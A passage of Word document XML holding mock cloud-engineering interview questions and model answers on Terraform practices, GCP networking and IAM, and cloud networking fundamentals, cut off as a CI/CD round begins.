          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A module is a reusable, self-contained set of Terraform configuration with defined input variables and outputs, letting you package a common infrastructure pattern (like a standardized GKE cluster setup) once and reuse it across environments/teams by simply calling the module with different inputs. This reduces duplication, encodes best practices centrally, and lets you version the module so consumers upgrade deliberately rather than everyone maintaining their own copy-pasted configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Terraform environments: How do you manage multiple environments such as dev, staging, and production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use separate state files/workspaces per environment (either Terraform workspaces, or better for isolation, entirely separate directories/backends per environment) so a mistake in dev can never touch production state. Share common logic through modules with environment-specific variable files (dev.tfvars, prod.tfvars) supplying the differences, keeping the underlying infrastructure pattern consistent across environments while allowing appropriately different sizing/settings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Terraform import: How do you import existing resources into Terraform safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Write the Terraform resource configuration to match the existing resource's actual current settings, then use `terraform import` (or import blocks) to associate it with state, and immediately run `terraform plan` to confirm zero diff - any difference shown means your written config doesn't yet match reality and needs correcting before you apply anything. Import incrementally and require a reviewed plan before the first real apply against newly imported resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Terraform lifecycle block: What is the Terraform lifecycle block, and when would you use it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The lifecycle block customizes how Terraform manages a resource's create/update/destroy behavior - `create_before_destroy` ensures a replacement resource is created before the old one is destroyed (useful for zero-downtime replacement of things like load balancer backends), `prevent_destroy` blocks accidental deletion of critical resources, and `ignore_changes` tells Terraform to ignore drift on specific attributes that are legitimately managed outside Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Terraform secrets: How do you handle secrets in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Avoid embedding raw secret values in Terraform variables where possible - reference secrets already stored in Secret Manager and grant resources access to fetch them at runtime instead. Mark any genuinely necessary sensitive variables/outputs with `sensitive = true` to redact them from CLI output, store state in an encrypted remote backend with tightly restricted access (state still contains plaintext values), and never commit .tfvars files containing secrets to version control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Terraform cost optimization: How do you reduce infrastructure cost using Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Encode cost-conscious defaults directly into modules (appropriately sized machine types, autoscaling limits, lifecycle policies for storage) so every consumer benefits without needing to know the details, and use Terraform's plan output in CI combined with a cost estimation tool (Infracost or similar) to surface the cost impact of a change before it's applied. Regularly audit and remove unused resources that Terraform still tracks in state but nothing actually uses anymore.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 19 - GCP Architecture and IAM Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. GCP project architecture: Describe a GCP project architecture you have implemented.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A typical architecture uses a folder hierarchy separating environments (prod/non-prod) and business units, with one project per workload/environment combination rather than shared projects mixing concerns, networking centralized through a Shared VPC host project, and org policies enforced at the folder level so every new project inherits consistent security guardrails automatically rather than requiring manual configuration each time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Shared VPC: Explain Shared VPC and when you would use host and service projects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Shared VPC lets a host project own and manage the VPC network (subnets, firewall rules, routes) while attached service projects deploy their resources (VMs, GKE clusters) into that shared network without owning networking configuration themselves. Use it when you want centralized network governance and consistent IP addressing/firewall policy across many teams' projects, while still giving each team project-level autonomy over their own resources and IAM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Hub-and-spoke architecture: Explain hub-and-spoke architecture in GCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Hub-and-spoke centralizes shared services and connectivity in a hub VPC/project, with spoke VPCs (per team or environment) connected to the hub via VPC peering or Shared VPC, so spokes can reach shared resources (like a central NAT gateway, DNS, or security appliances) in the hub without needing direct peering to every other spoke, simplifying network topology and centralizing control over cross-cutting network concerns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Hub project resources: How do you deploy shared resources in a hub project?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Deploy resources that need to be centrally managed and consumed by multiple spokes - Cloud NAT, Cloud VPN/Interconnect gateways, centralized DNS, or shared security appliances - in the hub project's VPC, then configure peering or Shared VPC attachment from spoke projects so they can route to and use those shared resources without duplicating them per spoke, which both reduces cost and centralizes operational ownership.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Cloud DNS: Explain Cloud DNS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud DNS is GCP's managed, highly available DNS service supporting both public zones (resolvable from the internet) and private zones (resolvable only within specified VPCs), letting you manage DNS records via the same IAM and Terraform tooling as the rest of your GCP infrastructure instead of a separate external DNS provider, with low-latency global anycast resolution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Cloud NAT: Explain Cloud NAT and the problem it solves.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud NAT provides outbound-only internet connectivity for VMs and GKE nodes that don't have public IP addresses, solving the problem of needing internet egress (for package downloads, external API calls) without exposing those instances directly to inbound internet traffic, which is a core part of running a private-by-default network architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. VPN Gateway: Explain VPN Gateway and how it connects networks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Cloud VPN Gateway establishes an encrypted IPsec tunnel between your GCP VPC and an on-premises or another cloud's network device, routing traffic over the public internet but encrypted end-to-end, which lets private resources on both sides communicate securely without provisioning a dedicated physical connection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Cloud Router: Explain Cloud Router and its role with dynamic routing and BGP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Router enables dynamic routing using BGP, automatically exchanging route information between your GCP VPC and a connected on-premises or partner network over VPN or Interconnect, so route changes on either side propagate automatically rather than requiring manual static route updates - it's what makes hybrid connectivity resilient to topology changes without ongoing manual maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. GCP IAM: Explain IAM in GCP and how roles are assigned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: IAM controls who (a user, group, or service account) can do what (a role, which is a bundle of permissions) on which resource, with bindings assignable at the organization, folder, project, or individual resource level, and permissions inheriting downward through that hierarchy. Roles come in three types - basic (broad, legacy Owner/Editor/Viewer), predefined (curated, service-specific like roles/storage.objectViewer), and custom (organization-defined for precise least-privilege needs).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Cloud Identity: What is Cloud Identity, and how does it relate to users and groups?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Identity is Google's identity management service providing the user and group directory that GCP IAM bindings reference - it's what lets you manage employee accounts, organizational units, and groups centrally (often synced from an existing directory like Active Directory) and then grant IAM roles to those Cloud Identity groups rather than managing permissions per individual user account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. GCP user access: How do you provide read-only or admin access to users safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Grant predefined roles like roles/viewer for read-only access and more specific admin roles (scoped to only the services a user actually needs, not broad Owner/Editor) for elevated access, assigned to groups rather than individual users so access changes with group membership automatically. Use time-bound or just-in-time elevated access for genuinely temporary admin needs rather than standing broad permissions, and review access periodically with IAM Recommender.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. GCP infrastructure security: How do you secure GCP infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Layer defenses: least-privilege IAM enforced via groups and periodic review, org policies restricting risky configurations (public IPs, unrestricted service account keys), network segmentation via Shared VPC and firewall rules, Workload Identity instead of static keys, Binary Authorization for verified deployments, and continuous posture monitoring via Security Command Center with audit logging enabled everywhere. No single control is sufficient - defense in depth across identity, network, and workload layers is the goal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. PSA vs PSC: Explain the difference between Private Service Access (PSA) and Private Service Connect (PSC) in GCP. When would you use each to connect privately to managed services (e.g. Cloud SQL, third-party or your own published services), and what does the network topology look like for both?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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PSA vs PSC: Explain the difference between Private Service Access (PSA) and Private Service Connect (PSC) in GCP. When would you use each to connect privately to managed services (e.g. Cloud SQL, third-party or your own published services), and what does the network topology look like for both?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 20 - Networking Fundamentals Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. VPC fundamentals: Explain VPC in cloud networking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A VPC (Virtual Private Cloud) is a logically isolated, private network within a cloud provider where you define IP address ranges, subnets, routing, and firewall rules for your resources, giving you the same conceptual control as a traditional on-premises network but implemented as software-defined infrastructure that scales globally and integrates with the provider's other managed services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Public vs private subnet: What is the difference between public and private subnets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A public subnet's resources can have public IP addresses and are directly reachable from (and can reach) the internet; a private subnet's resources have no public IP and can only reach the internet outbound through a NAT gateway, with no direct inbound path from the internet - private subnets are the default choice for anything that doesn't need to be internet-facing, minimizing exposed attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Routing fundamentals: Explain routing in a cloud network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Routing determines the path network traffic takes between subnets, VPCs, and external networks - cloud VPCs come with implicit routes for local subnet traffic, and you add custom static routes (or use dynamic routing via BGP with Cloud Router) for traffic destined to external networks, other VPCs, or on-premises systems, with the routing table ultimately deciding which gateway or next hop handles each packet based on destination IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. VPN connectivity: How does VPN connectivity work between on-premises and cloud?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A VPN gateway on the cloud side and a compatible device on-premises establish an IPsec tunnel over the public internet, encrypting traffic between the two networks so private IP ranges on both sides can communicate as if directly connected. Routes (static or dynamic via BGP) determine which traffic is sent through the tunnel, and redundant tunnels/gateways are typically used for high availability since a single VPN tunnel is a potential single point of failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Firewall rules: Explain firewall rules and how you design them safely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Firewall rules control what traffic is allowed to and from resources based on source/destination, port, protocol, and often network tags or service accounts rather than just IP ranges. Design them safely with a default-deny posture, narrowly scoped allow rules (specific ports and sources, not 0.0.0.0/0 unless genuinely required), tag or service-account-based rules for easier management at scale, and regular review/cleanup of unused rules since firewall configuration tends to accumulate cruft over time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. DNS resolution: How does DNS resolution work in hybrid or cloud environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: In hybrid environments, DNS resolution needs a strategy for which resolver handles which domains - typically split-horizon DNS where internal/private zones resolve via Cloud DNS private zones or forwarding to on-premises DNS servers for on-prem domains, while public domains resolve normally. Getting this wrong (or having TTL/caching mismatches) is a common source of intermittent connectivity issues that look like network problems but are actually resolution problems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Hybrid connectivity: How do on-premises systems connect to GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: On-premises systems connect via Cloud VPN (IPsec tunnels over the internet, simpler and lower cost), Dedicated Interconnect (a direct physical connection for high bandwidth and low latency), or Partner Interconnect (through a supported service provider when direct connection isn't feasible) - the choice depends on required bandwidth, latency sensitivity, and budget, with Cloud Router providing dynamic BGP routing on top of any of these options.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 21 - CI/CD and Azure Identity Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. CI/CD pipeline: Explain your CI/CD pipeline from code commit to production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
